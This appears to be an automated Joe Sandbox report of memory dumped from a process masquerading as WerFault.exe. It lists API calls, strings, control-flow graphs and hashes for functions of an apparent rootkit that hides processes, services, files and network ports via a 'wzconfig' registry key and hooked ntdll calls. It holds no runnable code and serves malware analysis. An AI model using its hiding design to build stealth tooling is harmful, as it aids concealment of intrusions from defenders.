                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7331B136214FA086EB60CF65E84839E73A0FB89758F600126EE9D53BADDF39C555CB00

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-440640706
• Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction ID: 4cf1d601b45d8cfd585966c7894cdb11d489de46f83f5635d0ac97c3bb9e9834
• Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
• Instruction Fuzzy Hash: 16712A3A310E7086EB10DFA6E88869963A4FF84B8CF112111DE8E67B6DDF3AC554C744

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction ID: 933416470bf91a19b4e498ec88dd264e59b18fbaf5a7c8b78ab72bac9e2d62f9
• Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
• Instruction Fuzzy Hash: 77516076200FA496EB50CFA2E44835AB7A1FB89F99F244124DE891772CDF3EC055CB00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
• API String ID: 4175298099-1975688563
• Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction ID: 5adf43ebddf11eade95878041d7ab360bf26ad57597a7c89bca3808db41e5037
• Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
• Instruction Fuzzy Hash: AB3190B8210EBAA4EA05EFE5EC5D7E46321AF4434CFD01493940A3717E9F7A824EDB40

Control-flow Graph

APIs
• GetLastError.KERNEL32 ref: 00000265B3C0D3A7
• FlsGetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D3BC
• FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D3DD
• FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D40A
• FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D41B
• FlsSetValue.KERNEL32(?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D42C
• SetLastError.KERNEL32 ref: 00000265B3C0D447
• FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D47D
• FlsSetValue.KERNEL32(?,?,00000001,00000265B3C0F23C,?,?,?,?,00000265B3C0C50F,?,?,?,?,?,00000265B3C07AC0), ref: 00000265B3C0D49C
  • Part of subcall function 00000265B3C0DC3C: HeapAlloc.KERNEL32 ref: 00000265B3C0DC91
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4C4
  • Part of subcall function 00000265B3C0DCB4: HeapFree.KERNEL32 ref: 00000265B3C0DCCA
  • Part of subcall function 00000265B3C0DCB4: GetLastError.KERNEL32 ref: 00000265B3C0DCD4
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4D5
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000265B3C10FDB,?,?,?,00000265B3C109CC,?,?,?,00000265B3C0CDBF), ref: 00000265B3C0D4E6
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction ID: ba8a9e7bff2a794a500c3c63bec6bc956971efab6360a7702da30acbb626b26d
• Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
• Instruction Fuzzy Hash: A041BD34304FF082FA58A7F2995D72962429F447BCF1417A4A93ABB7DFDE2B94458E00

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
• API String ID: 2171963597-1908187885
• Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction ID: fb0b3187f870eaa793dbce2cf3c144504233a63520bb5262f31129d67ba5d86a
• Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
• Instruction Fuzzy Hash: BC213D36614FA092EB10CF65E44835A73A0FB89BA9F604215EE5912BACCF7DC159CF00

Control-flow Graph
[control_flow_graph 428, function at 265b3c0aaf0: rendered graph with Executed / Not Executed edges; raw edge list omitted]
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction ID: b126d96e713e17712899e8751b41c7f8822b7172a83e217d75a36f3f2e99f09a
• Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
• Instruction Fuzzy Hash: F0D1AC76604BB08AEB60DFA5D48839D77A0FB45B8CF104255EE8D67B9ADB36D490CB00

Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: fa292ae88bf309691171d7b37f29d7321a702e3f5bc588aa8e872300ce44a39d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6241E432311EB051FA55CB96A80CB962395BF49FE8F194125DD0DBB78CEF3AC4858700

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 577 265b3c0104c-265b3c010b9 RegQueryInfoKeyW 578 265b3c011b5-265b3c011d0 577->578 579 265b3c010bf-265b3c010c9 577->579 579->578 580 265b3c010cf-265b3c0111f RegEnumValueW 579->580 581 265b3c011a5-265b3c011af 580->581 582 265b3c01125-265b3c0112a 580->582 581->578 581->580 582->581 583 265b3c0112c-265b3c01135 582->583 584 265b3c01147-265b3c0114c 583->584 585 265b3c01137 583->585 586 265b3c01199-265b3c011a3 584->586 587 265b3c0114e-265b3c01193 GetProcessHeap call 265b3c16168 GetProcessHeap HeapFree 584->587 588 265b3c0113b-265b3c0113f 585->588 586->581 587->586 588->581 590 265b3c01141-265b3c01145 588->590 590->584 590->588
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: 953c94f313aa51b2b07815c0b7c674d28838e84e1a507797bbfd9e073ae97e59
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 90418F37214FA4D6E7A4CF61E44839AB7A1F788B88F548129DA891775CDF3AC545CB00

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000265B3C0CD4E,?,?,?,?,?,?,?,?,00000265B3C0D50D,?,?,00000001), ref: 00000265B3C0D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 4f203283e50808a10e8c9f0b83b36f37aca73b7da4e54cbee02c12fad81ece88
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06119030304FF081FA58A7A2695D72D2242AF447FCF0457A4A83DA77DEDE2AC5454E00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: ef4e31b1861857ac6e5888225eeee932d3457fbbc8bf0dcff6ebad1572a66948
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5181F779600FF146FB58ABE9944D39922E0AF8578CF744095AA097379EEB3BC941CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 67d4d90453a5e8255ef5c2ce1f0a143d5e4cb54238212338619f91891ec69ad2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C31C136312EB0E1EE55DBC2E8083552394BF44BA8F6A46359D1D2B398DF3BD4948B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: ec98bbe983424d857dbb2e910f9d1d79588046cf703999e266e6c01844fab790
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6118231314E7086E7908B92F85831972B4FB88FE8F644214EE5A977A8CF7AC414D744
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction ID: 4bf4458373cbfe68d8e3ce14a3826da9e65b1fe10d7ff6e8b3832059c8e19638
• Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
• Instruction Fuzzy Hash: C211A136300F6092EF549B92F44C36A63A0FF88B88F140069DE8913B98EF3EC504CB08

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction ID: a6f8fc61d4b3fea6dc9a66bb71ad91eead48e29e30ad2566b163d4c39b602173
• Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
• Instruction Fuzzy Hash: 9AD1A876208FA882DA709B5AE49835AB7B0F7C8B88F105156EACD577A9DF3DC541CF00

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID: C:\Windows\system32\WerFault.exe
• API String ID: 3168794593-2813204550
• Opcode ID: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction ID: faa364e1d180861c150d5367ca9f40bfb18301776936922f6671f5fd3eaadef4
• Opcode Fuzzy Hash: 8f6c8013f26ca493c8b85487be1e8632cd5ea831c810228ac57a4b2b7c934696
• Instruction Fuzzy Hash: 7D3181B7509EF0AAE391CBF9D8592596FA0FB85F48F398015DEC42335BDA279421D700

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
• Opcode ID: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction ID: 3573062f26d348e38c1b0aac189e5c17a412a166efee5738f7d7f3ea1f1b6ae3
• Opcode Fuzzy Hash: 5a5575a5d1708c946e79aad68248bc2e3b8df018e302dfb520b8908bc7679156
• Instruction Fuzzy Hash: 8811AC70314FF082FA58B3E29A5D7292252AF447FCF1403A4AC36A77DEDE2AC4458E00

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
• Opcode ID: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction ID: feb2a10e1dbac8b2057ba4fd8a4a59a85494e341ddde97ed423a7f12b22e8d62
• Opcode Fuzzy Hash: 8727d58878f2a869f14b8fd26c384ee344685f44cd71b3c6aa4d19fd6db2488a
• Instruction Fuzzy Hash: 67018031300EA096EB50DB92E45C359A3A1FB88FC8FA84034DE8963758DF3EC959C700

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
• Opcode ID: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction ID: 50df3790e3e6610717c87c47698b3d0c1b550baa087b6062a74a139a7456795a
• Opcode Fuzzy Hash: 6a4903f23145d629ccf7c0814750504573150cedf00e013b6ac3f495348c8662
• Instruction Fuzzy Hash: 9F012975711F7086EB649BA5E81C31962A4BF48B8AF540128CE8927369EF3EC518DB04

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
• Opcode ID: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction ID: b4d8089dee392d1a3fa0bb457632b42721e2caee24f374947a88adb3a52736d3
• Opcode Fuzzy Hash: 230e05f875843765b10c94681cacd2039b66fa3fae77185737d73b0c30566c8e
• Instruction Fuzzy Hash: 00F08270314FB091EA048B93F91C119A261AF48FD8F548031EE8A27B1CCF3DC495C700

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction ID: d42a3ba1e659b2f51b9ab46885df229ae9ecb53eaeaeb8013c647c9e96035245
• Opcode Fuzzy Hash: 0e03656a98ecf47c8c70bd094229c94189d23a90474f93e2876379b06086d007
• Instruction Fuzzy Hash: 83F06275211E3491EB108BA4E44C3595320EF85B69F64421ACA6A596F9CF2EC154D700

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction ID: e746b50112f850f070068e887a8b3576dfb0868463e56809d211077fdefce0a3
• Opcode Fuzzy Hash: d320431a3885b97cf1102f80532d88567ca490bad17f23be6033182695dcdf12
• Instruction Fuzzy Hash: B602C83621DBE486EB60CB95E49435AB7A0F7C4798F104015EA8E97BA8DF7EC844CF00

APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
• Instruction ID: 144f0c22e287931e6232cefa605c0a9db5a7f50df834e3f038ee37cc907f94cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58d07a547137d2bff2769a738302b31e3611db479abe89d2490128d207b61db9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561DA76519FA4C7E7608B99E45831AB7A0F788788F105255FA8D53BACDB7EC940CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction ID: c989fef3bf337ca562cee92529b7291bb130821883d4082647cce761f03871b3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F511A936AF0E7141F65423E8D45E36911706F6977CF350674A9B7367EECA2688426100
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: cf8963f98abd2b82eaee3ee45e7406df1f6bc69c69f16fd2fa698abaf44b4765
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E51CD32311FB08AEB54DB99E448B6C7795EB44B9CF518161EA466378CDB3AE841CB08
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: 8bd76bcae79b7b7819a18e225f38fd455d22610d64dd387b94865d63f31cf005
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF619D72508FE482EB60CF55E44439AB7A0FB85B98F048255EB9923B99DF3AD194CF00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
